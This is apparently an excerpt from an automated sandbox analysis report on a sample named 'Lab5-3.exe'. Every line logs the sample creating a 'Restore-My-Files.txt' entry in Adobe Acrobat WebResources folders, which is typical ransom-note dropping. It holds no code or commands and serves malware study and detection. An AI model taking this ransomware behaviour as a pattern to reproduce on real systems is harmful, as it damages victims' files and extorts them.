                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\en-us\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\en-us\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\Restore-My-Files.txtJump to behavior
